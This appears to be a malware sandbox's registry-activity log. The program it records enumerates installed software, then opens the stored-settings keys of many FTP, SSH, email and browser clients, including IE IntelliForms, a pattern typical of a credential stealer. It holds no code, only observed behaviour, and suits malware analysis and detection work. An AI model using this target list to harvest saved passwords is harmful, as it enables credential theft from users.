| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PRJPROR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUSR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PRJPROR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUSR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PRJPROR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE}_Office14.VISIOR_{CDC4310F-8189-485F-B47D-D972217CE173} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE}_Office14.PRJPROR_{18A0C151-8F8A-4B68-A960-60C464B94329} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0011-0000-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPROR_{8A8F117F-8EDB-440D-B679-F08909D729F7} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE}_Office14.VISIOR_{01D8AE4B-A04D-47E5-81BF-E3F98B81B8C3} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\WinRAR | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\WinRAR | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Far Manager\Plugins\FTP\Hosts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Far\SavedDialogHistory\FTPHost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Far2\SavedDialogHistory\FTPHost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Far Manager\SavedDialogHistory\FTPHost | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghisler\Windows Commander | - |
|
21 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Ghisler\Windows Commander | - |
|
21 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghisler\Total Commander | - |
|
21 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Ghisler\Total Commander | - |
|
21 | |
| Open Key | HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\FlashFXP\3 | - |
|
9 | |
| Open Key | HKEY_CURRENT_USER\Software\FlashFXP | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\FlashFXP\4 | - |
|
12 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\FlashFXP\3 | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\FlashFXP | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\FlashFXP\4 | - |
|
12 | |
| Open Key | HKEY_CURRENT_USER\Software\FileZilla | - |
|
58 | |
| Open Key | HKEY_CURRENT_USER\Software\FileZilla Client | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\FileZilla | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\FileZilla Client | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\BPFTP | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\TurboFTP | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\TurboFTP | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Sota\FFFTP | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Sota\FFFTP\Options | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224 | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\FTP Explorer\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\VanDyke\SecureFX | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\ExpanDrive\Sessions | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\ExpanDrive | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\FTPClient\Sites | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\FTPClient\Sites | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\LeapWare | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Martin Prikryl | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Martin Prikryl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Opera Software | - |
|
6 | |
| Open Key | HKEY_CLASSES_ROOT\Opera.HTML\shell\open\command | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\AceBIT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\AceBIT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777} | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C} | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
14 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter | - |
|
14 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs | - |
|
14 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox | - |
|
14 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs | - |
|
14 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService | - |
|
8 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00 | - |
|
8 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00\0 | - |
|
8 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox | - |
|
14 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
14 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | - |
|
8 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall | - |
|
14 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
14 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin | - |
|
8 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions | - |
|
14 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\LeechFTP | - |
|
6 | |
| Open Key | HKEY_CLASSES_ROOT\CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32 | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
327 | |
| Open Key | HKEY_CURRENT_USER\Software\Adobe\Common | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\ChromePlus | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings | - |
|
12 | |
| Open Key | HKEY_CLASSES_ROOT\FTP++.Link\shell\open\command | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32 | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\FTPServers | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\FTPServers | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\Scripts | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\Scripts | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\LinasFTP\Site Manager | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\CoffeeCup Software | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CoffeeCup Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\FTP | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Nico Mak Computing\WinZip\FTP | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\mru\jobs | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Nico Mak Computing\WinZip\mru\jobs | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Mail | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\RimArts\B2\Settings | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\RimArts\B2\Settings | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Poco Systems Inc | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Poco Systems Inc | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\IncrediMail | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\IncrediMail | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\RIT\The Bat! | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\RIT\The Bat!\Users depot | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\RIT\The Bat! | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\RIT\The Bat!\Users depot | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\24f93cf8ea9a9546b93f8dc78abb6a97 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3c51f4951df2d34baef1a05b725728d2 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\42405d6c3502e64caa2aeda354771336 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5e8673e5f416694397a90d6dc37f5694 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\600082486368c34683de3c06ff753b3b | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6c393c97bf8f52408197f7e63b61e548 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
93 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
93 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
51 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9fd587aab699e24cb035dd8129bd6b5b | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\d9417b97bf6b594d89a41cdbed740112 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e3233d298149174193c9c78f955de155 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e50f0eb5db19ee44ba2717941e28e885 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00\0 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\WinRAR | - |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX | value_name = UninstallString, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX | value_name = DisplayName, data = 65 |
